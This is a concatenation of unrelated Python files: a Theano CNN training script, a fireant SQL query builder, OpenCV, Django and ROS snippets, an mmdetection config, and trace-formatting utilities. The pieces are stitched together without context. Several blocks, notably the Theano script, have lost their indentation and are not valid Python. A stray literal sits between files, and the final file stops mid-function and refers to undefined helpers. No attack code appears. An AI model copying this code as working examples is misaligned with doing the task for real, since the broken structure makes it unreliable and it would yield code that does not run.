compressed_data = [compress_model(i).ravel() for i in xrange(n_train_batches)]
numpy.save(compress_out,compressed_data)
print '... saved '+compress_out
# recons
#for da in reversed(sda.dA_layers):
# temp=da.get_reconstructed_input(temp)
if result_filename!=None:
path, ext = os.path.splitext( os.path.basename(result_filename))
if train_set_x2==None:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size]
})
else:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size],
x2:train_set_x2[index*batch_size:(index+1)*batch_size]
})
if(ext==".csv" or ext==".txt"):
fp = open(result_filename, 'w')
output = [f(i) for i in xrange(n_train_batches)]
for x in output:
fp.writelines(str(x[0])+"\n")
else:
output = [f(i) for i in xrange(n_train_batches)]
numpy.save(output,result_filename)
return
def learn(learning_rate=0.1, n_epochs=200,
train_set_x=None,
train_set_x2=None,
train_set_y=None,
compress_out=None,
validation_frequency=1000,
batch_size=500,
result_filename=None,
cnn=None):
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
errors,compress,pred,cost,cnn_params,mlp_params,lr_params = cnn.build(batch_size=batch_size)
params=cnn_params+mlp_params+lr_params
index,x,y=cnn.get_vars()
x2=cnn.var_x2
# error function
if train_set_x2==None:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
grads = T.grad(cost, params)
# train_model is a function that updates the model parameters by
# SGD Since this model has many parameters, it would be tedious to
# manually create an update rule for each model parameter. We thus
# create the updates list by automatically looping over all
# (params[i],grads[i]) pairs.
updates = []
for param_i, grad_i in zip(params, grads):
updates.append((param_i, param_i - learning_rate * grad_i))
if train_set_x2==None:
train_model = theano.function([index], cost, updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
train_model = theano.function([index], cost, updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
###############
# TRAIN MODEL #
###############
print '... training'
patience = 10000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is found
improvement_threshold = 0.995
#validation_frequency = min(n_train_batches, patience / 2)
best_params = None
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
start_time = time.clock()
epoch = 0
while(epoch < n_epochs):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print '... training @ iter = ', iter
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
test_losses = [test_model(i) for i in xrange(n_train_batches)]
test_score = numpy.mean(test_losses)
print (('... epoch %i, minibatch %i/%i, test error of best '
'model %f %%') % \
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
end_time = time.clock()
print('Optimization complete.')
print('Best validation score of %f %% obtained at iteration %i,'\
'with test performance %f %%' %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
#
#
if compress_out!=None:
if train_set_x2==None:
compress_model = theano.function([index], compress,
givens={x: train_set_x[index * batch_size: (index + 1) * batch_size]})
else:
compress_model = theano.function([index], compress,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
# x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
})
compressed_data = [compress_model(i) for i in xrange(n_train_batches)]
numpy.save(compress_out,compressed_data)
print '... saved '+compress_out
if result_filename!=None:
path, ext = os.path.splitext( os.path.basename(result_filename))
if train_set_x2==None:
f=theano.function([index],pred,givens={x:train_set_x[index*batch_size:(index+1)*batch_size]})
else:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size],
x2:train_set_x2[index*batch_size:(index+1)*batch_size]})
if(ext==".csv" or ext==".txt"):
fp = open(result_filename, 'w')
output = [f(i) for i in xrange(n_train_batches)]
for x in output:
fp.writelines(str(x[0])+"\n")
else:
output = [f(i) for i in xrange(n_train_batches)]
numpy.save(output,result_filename)
return cnn_params,mlp_params,lr_params
def load_CNN(filename):
    """Load a parameter dict previously written by save_CNN.

    :param filename: path to a cPickle dump (.dump)
    :return: dict with keys 'ws', 'bs', 'cnn1', 'cnn2'
    """
    # BUG FIX: the file handle was never closed; use a context manager.
    with open(filename, 'rb') as fd:
        param = cPickle.load(fd)
    #print param
    return param
def save_CNN(filename,cnn_params,mlp_params,lr_params):
    """Dump trained parameters to `filename` with cPickle.

    The parameter lists alternate W, b per layer; they are unpacked into a
    dict {'cnn1': conv Ws, 'cnn2': conv bs, 'ws': hidden+output Ws,
    'bs': hidden+output bs} matching what load_CNN/CNN.load expect.
    """
    cnn1=[]
    cnn2=[]
    # conv layers: even index = W, odd index = b (py2 integer division)
    for i in range(len(cnn_params)/2):
        cnn1.append(cnn_params[i*2].get_value(borrow=True))
        cnn2.append(cnn_params[i*2+1].get_value(borrow=True))
    ws=[]
    bs=[]
    for i in range(len(mlp_params)/2):
        ws.append(mlp_params[i*2].get_value(borrow=True))
        bs.append(mlp_params[i*2+1].get_value(borrow=True))
    # the output (logistic regression) layer is appended last
    ws.append(lr_params[0].get_value(borrow=True))
    bs.append(lr_params[1].get_value(borrow=True))
    params={'ws':ws,'bs':bs,'cnn1':cnn1,'cnn2':cnn2}
    # BUG FIX: the file handle was never closed; use a context manager.
    with open(filename,'wb') as fd:
        cPickle.dump(params,fd)
if __name__ == '__main__':
vec_col=args.ignore_col
batch_size=args.batch
train_set_x=None
train_set_y=None
shared_y = None
if args.dat_col!="":
print "... reading input data (x) from : "+args.input_file+"(dat)..."
ncols=int(args.dat_col)
train_set_x=load_dat(args.input_file,ncols)
elif args.numpy:
print "... reading input data (x) from : "+args.input_file+"(numpy)..."
temp=numpy.load(args.input_file)
train_set_x=numpy.asarray(temp,dtype=theano.config.floatX)
#print train_set_x
else:
print "... reading input data (x) from : "+args.input_file+"(csv)..."
data=[]
ignore=[]
ans_data=[]
spamReader = csv.reader(open(args.input_file, 'r'), delimiter=',')
ans_col=args.ans_col
for row in spamReader:
r=map(float,row[vec_col:])
if vec_col>0: ignore.append(row[:vec_col])
if ans_col!=None:
if len(ans_col)==1:
ans_data.append(int(row[ans_col[0]]))
else:
ans_data.append([int(row[i]) for i in ans_col])
data.append(r)
train_set_x=data
if ans_col!=None: train_set_y=ans_data
num_data=len(train_set_x)
learning_rate=0.1
borrow=False
n_class=args.n_class
n_train=args.train
pool_size=map(lambda s:map(int,s.split(",")),args.pool)
filter_size=map(lambda s:map(int,s.split(",")),args.filter)
print "# args : " + str(args)
print "# num_data : " + str(num_data)
print "# num_out : " + str(n_class)
print "# train set x : ", len(train_set_x)
print "# pool size : ", str(pool_size)
print "# filter size : ", str(filter_size)
print "# # of kernels : ", str(args.n_kernel)
print "# num_hidden : "+str(args.mlp_layer)
if args.ans_filename!=None:
print "... loading training data (y) from :" + args.ans_filename + "..."
if args.numpy:
train_set_y=numpy.asarray(numpy.load(args.ans_filename),dtype=numpy.int32)
#train_set_y=numpy.asarray(numpy.load(args.ans_filename),dtype=theano.config.floatX)
else:
data=[]
spamReader = csv.reader(open(args.ans_filename, 'r'), delimiter=',')
for row in spamReader:
r=map(float,row)
data.append(r)
train_set_y=data
#train_set_y=numpy.asarray(temp,dtype=theano.config.floatX)
train_set_x=train_set_x[:len(train_set_y)]
print "# train set y : ",len(train_set_y)
shared_y = theano.shared(numpy.asarray(train_set_y,dtype=numpy.int32),borrow=borrow)
num_data=len(train_set_y)
shared_x = theano.shared(numpy.asarray(train_set_x,dtype=theano.config.floatX),borrow=borrow)
if args.input2!=None:
print "... reading input2 data (x) from : "+args.input2+"(numpy)..."
temp=numpy.load(args.input2)
train_set_x2=numpy.asarray(temp,dtype=theano.config.floatX)
shared_x2 = theano.shared(numpy.asarray(train_set_x2,dtype=theano.config.floatX),borrow=borrow)
###
input_tensor=2
if args.channel>1:
input_tensor=3
###
rng = numpy.random.RandomState(23455)
cnn=CNN(
rng=rng,
input_shape=args.input_shape,
input_tensor=input_tensor,
input_channel=args.channel,
nkerns=args.n_kernel,
pool_size=pool_size,
filter_size=filter_size,
mlp_layer=args.mlp_layer,
n_class=args.n_class,
x2_size=shared_x2.get_value(borrow=True).shape[1],
mlp_layer2=args.mlp_layer2
)
print cnn.get_image_shapes()
if args.param_file!=None:
params=load_CNN(args.param_file)
test_CNN(
train_set_x=shared_x,train_set_y=shared_y,
cnn=cnn,
batch_size=1,
param=params,
compress_out=args.compressed_file,
result_filename=args.result_filename,
train_set_x2=shared_x2
)
quit()
cnn_params,mlp_params,lr_params=learn(
learning_rate=learning_rate,
n_epochs=args.train,
cnn=cnn,
validation_frequency=args.validation_freq,
train_set_x=shared_x,
train_set_y=shared_y,
compress_out=args.compressed_file,
batch_size=batch_size,
result_filename=args.result_filename,
train_set_x2=shared_x2
)
save_file=args.save_param_filename
if save_file==None:
save_file="param_t"+str(n_train)+".dump"
save_CNN(save_file,cnn_params,mlp_params,lr_params)
#################
|
import itertools
from typing import Iterable
from fireant.utils import (
flatten,
format_dimension_key,
format_metric_key,
)
from pypika import (
Table,
functions as fn,
)
from .finders import (
find_and_group_references_for_dimensions,
find_joins_for_tables,
find_required_tables_to_join,
find_totals_dimensions,
)
from .reference_helper import adapt_for_reference_query
from .special_cases import apply_special_cases
from ..dimensions import (
Dimension,
TotalsDimension,
)
from ..filters import (
DimensionFilter,
Filter,
MetricFilter,
)
from ..joins import Join
from ..metrics import Metric
from ...database import Database
def adapt_for_totals_query(totals_dimension, dimensions, filters, apply_filter_to_totals):
    """
    Adapt dimensions and filters for a totals query.

    Dimensions from the totals dimension onward are wrapped in
    TotalsDimension.  Filters are selected according to the matching
    apply_filter_to_totals flag (missing flags default to True); metric
    filters are always dropped for totals queries.  A totals_dimension of
    None marks the base query, for which every filter is kept.

    :param totals_dimension: the dimension being rolled up, or None
    :param dimensions: all dimensions of the query
    :param filters: all filters of the query
    :param apply_filter_to_totals: per-filter flags, aligned with `filters`
    :return: (totals dimensions, totals filters)
    """
    assert len(filters) >= len(apply_filter_to_totals)

    is_totals_query = totals_dimension is not None

    # Everything before the totals dimension stays grouped; the rest rolls up.
    if is_totals_query:
        split_at = dimensions.index(totals_dimension)
    else:
        split_at = len(dimensions)
    grouped_dims = dimensions[:split_at]
    totaled_dims = dimensions[split_at:]
    totals_dims = grouped_dims + [TotalsDimension(dim) for dim in totaled_dims]

    totals_filters = []
    for fltr, apply_to_totals in itertools.zip_longest(filters, apply_filter_to_totals, fillvalue=True):
        keep = (not is_totals_query
                or (apply_to_totals and not isinstance(fltr, MetricFilter)))
        if keep:
            totals_filters.append(fltr)

    return totals_dims, totals_filters
@apply_special_cases
def make_slicer_query_with_totals_and_references(database,
                                                 table,
                                                 joins,
                                                 dimensions,
                                                 metrics,
                                                 operations,
                                                 filters,
                                                 references,
                                                 orders,
                                                 apply_filter_to_totals=(),
                                                 share_dimensions=()):
    """
    Build one query per (totals dimension, reference group) combination.

    :param database: slicer database (supplies the pypika query class)
    :param table: base table of the query
    :param joins: all joins available in the slicer
    :param dimensions: dimensions selected for the request
    :param metrics: metrics selected for the request
    :param operations: post-query operations (unused here; kept for the
        decorator/caller contract)
    :param filters: filters for the request
    :param references: reference groups (WoW, MoM, ...)
    :param orders: (term, orientation) pairs
    :param apply_filter_to_totals: per-filter flags for totals queries
    :param share_dimensions: dimensions that participate in share metrics
    :return: list of pypika queries, each annotated with _totals/_references
    """
    """
    The following two loops will run over the spread of the two sets including a NULL value in each set:
     - reference group (WoW, MoM, etc.)
     - dimension with roll up/totals enabled (totals dimension)
    This will result in at least one query where the reference group and totals dimension is NULL, which shall be
    called base query. The base query will ALWAYS be present, even if there are zero reference groups or totals
    dimensions.
    For a concrete example, check the test case in :
    ```
    fireant.tests.slicer.queries.test_build_dimensions.QueryBuilderDimensionTotalsTests
    #test_build_query_with_totals_cat_dimension_with_references
    ```
    """
    totals_dimensions = find_totals_dimensions(dimensions, share_dimensions)
    # reversed so the base (None) query comes first, then innermost totals
    totals_dimensions_and_none = [None] + totals_dimensions[::-1]
    reference_groups = find_and_group_references_for_dimensions(references)
    reference_groups_and_none = [(None, None)] + list(reference_groups.items())
    queries = []
    for totals_dimension in totals_dimensions_and_none:
        (query_dimensions,
         query_filters) = adapt_for_totals_query(totals_dimension,
                                                 dimensions,
                                                 filters,
                                                 apply_filter_to_totals)
        # NOTE(review): the loop variable `references` rebinds the function
        # parameter of the same name; works because the groups were computed
        # above, but worth renaming.
        for reference_parts, references in reference_groups_and_none:
            (ref_database,
             ref_dimensions,
             ref_metrics,
             ref_filters) = adapt_for_reference_query(reference_parts,
                                                      database,
                                                      query_dimensions,
                                                      metrics,
                                                      query_filters,
                                                      references)
            query = make_slicer_query(ref_database,
                                      table,
                                      joins,
                                      ref_dimensions,
                                      ref_metrics,
                                      ref_filters,
                                      orders)
            # Add these to the query instance so when the data frames are joined together, the correct references and
            # totals can be applied when combining the separate result set from each query.
            query._totals = totals_dimension
            query._references = references
            queries.append(query)
    return queries
def make_slicer_query(database: Database,
                      base_table: Table,
                      joins: Iterable[Join] = (),
                      dimensions: Iterable[Dimension] = (),
                      metrics: Iterable[Metric] = (),
                      filters: Iterable[Filter] = (),
                      orders: Iterable = ()):
    """
    Create a pypika/SQL query from slicer elements.

    Shared base for both the data-fetching query and the dimension-choices
    query: handles joins, dimension select/group-by, filtering (WHERE vs
    HAVING), metric selection and ordering.

    :param database: slicer database; supplies query_cls and trunc_date
    :param base_table: pypika.Table placed in the FROM clause
    :param joins: all joins available in the slicer; only required ones used
    :param dimensions: dimensions to select (and group, unless totals)
    :param metrics: metrics to select
    :param filters: filters to apply
    :param orders: (term, orientation) pairs for ORDER BY
    :return: the assembled pypika query
    """
    query = database.query_cls.from_(base_table)

    # Join only the tables actually referenced by the selected elements.
    elements = flatten([metrics, dimensions, filters])
    required_tables = find_required_tables_to_join(elements, base_table)
    for join in find_joins_for_tables(joins, base_table, required_tables):
        query = query.join(join.table, how=join.join_type).on(join.criterion)

    # Select every dimension; group all except totals placeholders.
    for dimension in dimensions:
        dimension_terms = make_terms_for_dimension(dimension, database.trunc_date)
        query = query.select(*dimension_terms)
        if isinstance(dimension, TotalsDimension):
            continue
        query = query.groupby(*dimension_terms)

    # Dimension filters go to WHERE; everything else to HAVING.
    for filter_ in filters:
        if isinstance(filter_, DimensionFilter):
            query = query.where(filter_.definition)
        else:
            query = query.having(filter_.definition)

    metric_terms = make_terms_for_metrics(metrics)
    if metric_terms:
        query = query.select(*metric_terms)

    # Order terms not already selected must be added to the select clause.
    selected_aliases = {el.alias for el in query._selects}
    for term, orientation in orders:
        query = query.orderby(term, order=orientation)
        if term.alias not in selected_aliases:
            query = query.select(term)

    return query
def make_latest_query(database: Database,
                      base_table: Table,
                      joins: Iterable[Join] = (),
                      dimensions: Iterable[Dimension] = ()):
    """Build a query selecting MAX(definition) for each dimension,
    joining only the tables the dimensions require."""
    query = database.query_cls.from_(base_table)

    # Join the tables needed by the dimensions.
    required_tables = find_required_tables_to_join(dimensions, base_table)
    for join in find_joins_for_tables(joins, base_table, required_tables):
        query = query.join(join.table, how=join.join_type).on(join.criterion)

    # One MAX(...) per dimension, aliased with its formatted key.
    for dimension in dimensions:
        alias = format_dimension_key(dimension.key)
        query = query.select(fn.Max(dimension.definition).as_(alias))

    return query
def make_terms_for_metrics(metrics):
    """Return one aliased pypika term per metric, keyed by its formatted key."""
    def aliased(metric):
        return metric.definition.as_(format_metric_key(metric.key))

    return [aliased(metric) for metric in metrics]
def make_terms_for_dimension(dimension, window=None):
    """
    Make the pypika terms needed to select/group a slicer dimension.

    :param dimension:
        A slicer dimension.
    :param window:
        Optional window function applied to continuous dimensions (those
        exposing an `interval` attribute).
    :return:
        One or two terms: the (possibly windowed) dimension definition, plus
        the display definition when the dimension has a display field.
    """
    # The window function only applies to continuous dimensions.
    definition = dimension.definition
    if window and hasattr(dimension, 'interval'):
        definition = window(definition, dimension.interval)
    key_term = definition.as_(format_dimension_key(dimension.key))

    if not dimension.has_display_field:
        return [key_term]

    display_term = dimension.display_definition.as_(format_dimension_key(dimension.display_key))
    return [key_term, display_term]
def make_orders_for_dimensions(dimensions):
    """
    Create default orderings for a list of dimensions.

    Reuses make_terms_for_dimension so the ordering terms are identical to
    the selected terms; the LAST term is taken, which prefers the display
    definition when one exists.

    :return:
        (term, None) pairs -- None orientation means the database default.
    """
    orders = []
    for dimension in dimensions:
        order_term = make_terms_for_dimension(dimension)[-1]
        orders.append((order_term, None))
    return orders
|
from .utils import clever_format
from .profile import profile, profile_origin
import torch
# Package-wide default tensor dtype (double precision) used by the
# profiling helpers above.
default_dtype = torch.float64
#
# Created on Thu Aug 24 2020
# Author: Vijendra Singh
# Licence: MIT
# Brief:
#
import os
import cv2
import parameters as params
def read_images(dir_name=params.DATA_DIR):
    '''
    @brief: read all images from a directory in sorted file-name order,
            downscale each by params.DOWN_FACTOR and return them
    @args[in]: dir_name: directory containing the input images
    @args[out]: list of grayscale images, ordered by sorted file name
    '''
    images = []
    image_names = os.listdir(dir_name)
    image_names.sort()
    for image_name in image_names:
        # flag 0 -> load as grayscale
        image = cv2.imread(os.path.join(dir_name, image_name), 0)
        if image is None:
            # BUG FIX: cv2.imread returns None for unreadable/non-image
            # files (e.g. .DS_Store); skip instead of crashing on .shape.
            print(image_name, 'skipped (not a readable image)')
            continue
        print(image_name, 'loaded')
        width = image.shape[1]//params.DOWN_FACTOR
        height = image.shape[0]//params.DOWN_FACTOR
        image = cv2.resize(image, (width, height))
        images.append(image)
        if params.TEST_BOOL:
            # debug preview: show each image until a key is pressed
            cv2.imshow(image_name, image)
            cv2.moveWindow(image_name, 100, 50)
            cv2.waitKey(0)
            cv2.destroyWindow(image_name)
    return images
|
from django.shortcuts import render
from .forms import StudentRegistration
# Create your views here.
def showformdata(request):
    """Render the enrollment form with a custom auto_id, label suffix and
    a pre-filled name."""
    form = StudentRegistration(
        auto_id='some_%s',
        label_suffix=' ?',
        initial={'name': 'rishabh'},
    )
    context = {'stud': form}
    return render(request, "enroll/userregistration.html", context)
|
class Task:
    """A simple to-do item: a title plus a done/not-done flag."""

    # Class-level defaults kept for backward compatibility with any code
    # that reads them from the class itself.
    title = "Task"
    done = False

    def __init__(self, title):
        """Create a task with the given title; it starts not done.

        Fix: `done` is now set explicitly per instance instead of relying
        on the shared class attribute for the initial state.
        """
        self.title = title
        self.done = False

    def check(self):
        """Toggle the done flag (done <-> not done)."""
        self.done = not self.done
# cff for L1GtAnalyzer module
#
# V.M. Ghete 2012-05-22
from L1Trigger.GlobalTriggerAnalyzer.l1GtAnalyzer_cfi import *
|
import os

# Root directory holding one sub-directory per recorded episode.
obj_dir = "/home/pirate03/hobotrl_data/playground/initialD/exp/record_rule_scenes_rnd_obj_v3_fenkai_rm_stp/val"

eps_names = sorted(os.listdir(obj_dir))
for eps_name in eps_names:
    eps_dir = obj_dir + "/" + eps_name
    # Rewrite 0000.txt as 0001.txt, renumbering the first CSV field of every
    # line to its 1-based line index.
    # BUG FIX: the original did `line.split(",")[0] = str(i+1)`, which only
    # mutates the temporary list returned by split() and leaves `line`
    # unchanged, so 0001.txt was a verbatim copy.  Mutate a named list and
    # re-join it instead.  Files are also now closed via `with`.
    with open(eps_dir + "/0000.txt", "r") as src, \
         open(eps_dir + "/0001.txt", "w") as dst:
        for i, line in enumerate(src):
            fields = line.split(",")
            fields[0] = str(i + 1)
            dst.write(",".join(fields))
# NOTE(review): the bare literal on the next line is a no-op expression
# statement -- it looks like accidental leftover content; confirm and remove.
1
import rospy
import Talker  # NOTE(review): imported but not used below
from std_msgs.msg import String
def speak_text_callback(data):
    # Placeholder: messages arriving on "speak_text" are currently ignored.
    pass
def socialist():
    """Start the 'socialist' ROS node, subscribe to the 'speak_text' topic
    and block until shutdown."""
    rospy.init_node("socialist")
    rospy.Subscriber("speak_text", String, speak_text_callback)
    rospy.spin()  # keep the node alive; callbacks run until shutdown
if __name__ == '__main__':
    socialist()
|
_base_ = '../res2net/cascade_rcnn_r2_101_fpn_20e_coco.py'
# Overrides on the base Cascade R-CNN config: composite CBRes2Net backbone
# with DCNv2 in stages 2-4, CBFPN neck, and soft-NMS at test time.
model = dict(
    backbone=dict(
        type='CBRes2Net',
        cb_del_stages=1,
        cb_inplanes=[64, 256, 512, 1024, 2048],
        dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False),
        stage_with_dcn=(False, True, True, True)),
    neck=dict(type='CBFPN'),
    test_cfg=dict(rcnn=dict(score_thr=0.001, nms=dict(type='soft_nms'))))
# ImageNet mean/std normalization, BGR -> RGB conversion enabled.
img_norm_cfg = dict(
    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# augmentation strategy originates from HTC
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='LoadAnnotations', with_bbox=True),
    # multi-scale training: long side 1600, short side sampled in [400, 1400]
    dict(
        type='Resize',
        img_scale=[(1600, 400), (1600, 1400)],
        multiscale_mode='range',
        keep_ratio=True),
    dict(type='RandomFlip', flip_ratio=0.5),
    dict(type='Normalize', **img_norm_cfg),
    dict(type='Pad', size_divisor=32),
    dict(type='DefaultFormatBundle'),
    dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
    dict(type='LoadImageFromFile'),
    # single-scale testing, no flip augmentation
    dict(
        type='MultiScaleFlipAug',
        img_scale=(1600, 1400),
        flip=False,
        transforms=[
            dict(type='Resize', keep_ratio=True),
            dict(type='RandomFlip'),
            dict(type='Normalize', **img_norm_cfg),
            dict(type='Pad', size_divisor=32),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='Collect', keys=['img']),
        ])
]
data = dict(
    train=dict(pipeline=train_pipeline),
    val=dict(pipeline=test_pipeline),
    test=dict(pipeline=test_pipeline))
# Mixed-precision training with dynamic loss scaling.
fp16 = dict(loss_scale=dict(init_scale=512))
|
import io, re, sys
import string
import pandas as pd
from toolz.functoolz import compose_left
from ast import literal_eval
from pathlib import Path
from types import SimpleNamespace
from typing import Dict, List, Tuple
from pdb import set_trace as st
from prettyprinter import pprint
from prettyprinter import cpprint
from dataclasses import dataclass
from collections import namedtuple
import importlib.util
# Load the sibling parse_verbose_argvars module from an absolute path (it
# lives outside this package tree, so a normal import would not find it).
spec = importlib.util.spec_from_file_location("parse_verbose_argvars", "/Users/alberthan/VSCodeProjects/vytd/src/youtube-dl/bin/fmtutil/row/parse_verbose_argvars.py")
parse_verbose_argvars = importlib.util.module_from_spec(spec)
spec.loader.exec_module(parse_verbose_argvars)
def old_process_call_datum(call_datum):
  """Parse a traced call line like ``"  => func(a=1, b=2)"`` and return the
  argument *values*, in order, as a list of strings (e.g. ``['1', '2']``).

  Bug fixed: the original returned ``splitvals`` without ever assigning it
  (the computation was commented out), so every call raised NameError, and
  it carried unreachable statements after the ``return``.  The commented-out
  parsing logic has been restored (and the debug ``print`` dropped).
  Each argument is expected to be ``name=value``; a piece with no ``=``
  raises ValueError, as the original logic would have.
  """
  # Capture leading indent, the "=> name" marker and the raw argvars text.
  rgx1 = re.compile(r"^(?P<indent>\s*)(?P<function>=>\s[A-z0-9_]+)\((?P<argvars>.*)\)$")
  m1 = rgx1.match(call_datum)
  gd1 = m1.groupdict()
  indent, function, argvars = gd1.values()
  # Split only on top-level commas: commas inside {...} literals are kept,
  # every other comma is first replaced with a unique sentinel string.
  rgx2 = re.compile(r"{[^}]+,[^]]+}|(,)")
  replacement = lambda m: "UniqStr" if m.group(1) else m.group(0)
  replaced = rgx2.sub(replacement, argvars)
  splitvars = replaced.split("UniqStr")
  # Each piece is "name=value"; keep the values in argument order.
  splitdct = dict(elm.split('=', 1) for elm in splitvars)
  splitvals = list(splitdct.values())
  return splitvals
# def pp(s) -> str:
# stream = io.StringIO()
# pprint(s,
# stream=stream,
# indent=2,
# width=220,
# # depth=_UNSET_SENTINEL, # default good
# compact=True, # noef?
# ribbon_width=220,
# max_seq_len=920, # noef?
# sort_dict_keys=True,
# end='\n' # the last line
# )
# return stream.getvalue()
# def cp(s) -> str:
# stream = io.StringIO()
# cpprint(s,
# stream=stream,
# indent=2,
# width=220,
# # depth=_UNSET_SENTINEL, # default good
# compact=True, # noef?
# ribbon_width=220,
# max_seq_len=920, # noef?
# sort_dict_keys=True,
# end='\n' # the last line
# )
# return stream.getvalue()
class FmtdCellData:
  """Base holder for one formatted trace cell; provides colorized pretty-printing."""
  def __init__(self,funcname):
    self.funcname = funcname
  def colorize(self,s) -> str:
    """Pretty-print *s* (literal-eval'd to a Python value when possible,
    otherwise printed as the raw string) and return the rendered text."""
    assert isinstance(s,str), s
    _stream = io.StringIO()
    try:
      litval = literal_eval(s)
      cpprint(litval,stream=_stream)
    except Exception:
      # literal_eval failed -- s is not a Python literal; print it raw.
      # (Narrowed from a bare ``except:`` that also swallowed
      # KeyboardInterrupt/SystemExit.)
      cpprint(s,stream=_stream)
    rv = _stream.getvalue()
    _stream.close()
    return rv
class FmtdCallData(FmtdCellData):
  """Formatted call-event data: argument names/values for one traced call."""
  def __init__(self, funcname, keyslst, valslst):
    super().__init__(funcname)
    self.keyslst = keyslst
    self.valslst = valslst
    # Strip whitespace and surrounding quotes from names and values.
    self.argnames = [k.strip().replace("'","") for k in self.keyslst]
    self.argvalues = [v.strip().replace("'","") for v in self.valslst]
  def get_fmtd_str(self,c=False):
    """..c:: (True|False|'All')"""
    if not c or c == 'All':
      d = {k:v for k,v in zip(self.argnames,self.argvalues)}
    if c or c == 'All':
      cz = self.colorize
      cd = {cz(k):cz(v) for k,v in zip(self.argnames,self.argvalues)}
    # Bug fix: with c=True the original returned ``d``, which is unbound in
    # that branch (NameError); return the colorized dict instead, matching
    # FmtdReturnData.get_fmtd_str.
    rv = (d,cd) if c == 'All' else d if not c else cd
    return rv
class FmtdVerboseCallData(FmtdCellData):
  """Formatted call-event data for verbose (very long) argument payloads."""
  def __init__(self, funcname, keyslst, valslst):
    super().__init__(funcname)
    self.keyslst = keyslst
    self.valslst = valslst
    # Bug fix: str.replace requires two arguments -- the original
    # ``.replace("'")`` raised TypeError on every construction.
    self.argnames = [k.strip().replace("'","") for k in self.keyslst]
    self.argvalues = [v.strip().replace("'","") for v in self.valslst]
  def get_fmtd_str(self,c=False):
    """..c:: (True|False|'All')"""
    if not c or c == 'All':
      d = {k:v for k,v in zip(self.argnames,self.argvalues)}
    if c or c == 'All':
      cz = self.colorize
      cd = {cz(k):cz(v) for k,v in zip(self.argnames,self.argvalues)}
    # Bug fix: with c=True the original returned the unbound ``d``
    # (NameError); return the colorized dict, matching FmtdReturnData.
    rv = (d,cd) if c == 'All' else d if not c else cd
    return rv
class FmtdReturnData(FmtdCellData):
  """Formatted return-event data: a function name plus its return values."""
  def __init__(self, funcname, retvalslst):
    super().__init__(funcname)
    self.retvalslst = retvalslst
  def get_fmtd_str(self, c=False):
    """..c:: (True|False|'All')"""
    if c == 'All':
      # Both the plain and the colorized tuple.
      cz = self.colorize
      plain = (self.funcname, self.retvalslst)
      return plain, (cz(self.funcname), cz(self.retvalslst))
    if c:
      cz = self.colorize
      return cz(self.funcname), cz(self.retvalslst)
    return self.funcname, self.retvalslst
class FmtdExceptionData(FmtdCellData):
  """Formatted exception-event data: a function name plus the raised values."""
  def __init__(self, funcname, retvalslst):
    super().__init__(funcname)
    self.retvalslst = retvalslst
  def get_fmtd_str(self, c=False):
    """..c:: (True|False|'All')"""
    want_plain = (not c) or c == 'All'
    want_color = bool(c)  # truthy covers both True and 'All'
    if want_plain:
      plain = (self.funcname, self.retvalslst)
    if want_color:
      cz = self.colorize
      colored = (cz(self.funcname), cz(self.retvalslst))
    if c == 'All':
      return plain, colored
    return colored if c else plain
def process_verbose_row(row):
  """Format one trace-dataframe row into a Fmtd*Data object.

  NOTE(review): this function looks unfinished.  ``parse_argvars``,
  ``FmtdVerboseCellData`` (probably meant ``FmtdVerboseCallData``) and
  ``colorize_string`` are not defined in this file, ``process_verbose_args``
  reads the free names ``function``/``indent``, and in
  ``prep_clean_classify_format`` the final ``return fmtd_cell_data`` can hit
  an unbound local when no branch matched.  Confirm before relying on it.
  """
  print(1)  # debug marker
  def process_verbose_args(indented_function,argvars):
    # Verbose path: delegate splitting of a very long argvars string.
    keyslst,valslst = parsed = parse_argvars(argvars)
    fmtd_cell_data = FmtdVerboseCellData(function,keyslst,valslst)
    return fmtd_cell_data
  def process_regular_args(indented_function,argvars):
    # Regular path: a single "name=value" pair split on '='.
    parse_argvars_ez = lambda s: map(str.strip,s.split('='))
    print(argvars)
    keys,vals = parsed = parse_argvars_ez(argvars)
    # print(indent,function,argvars)
    keylst,vallst = [keys],colorize_string(vals,e=True) # keep consistent with verbose
    fmtd_cell_data = FmtdCellData(f"{indent}{function}",keylst,vallst)
    return fmtd_cell_data
  def classify_whether_argvars_verbose(indented_function,argvars):
    # Heuristic: very long argvars payloads go down the verbose path.
    assert isinstance(argvars,str), argvars
    if len(argvars[1]) > 2000:
      return process_verbose_args(indented_function,argvars)
    else:
      return process_regular_args(indented_function,argvars)
  def prep_clean_classify_format(call_datum):
    # Regexes for the three hunter-style trace line shapes:
    # "=> name(args)" call, "<= name: [vals]" return, " ! name: [vals]" exception.
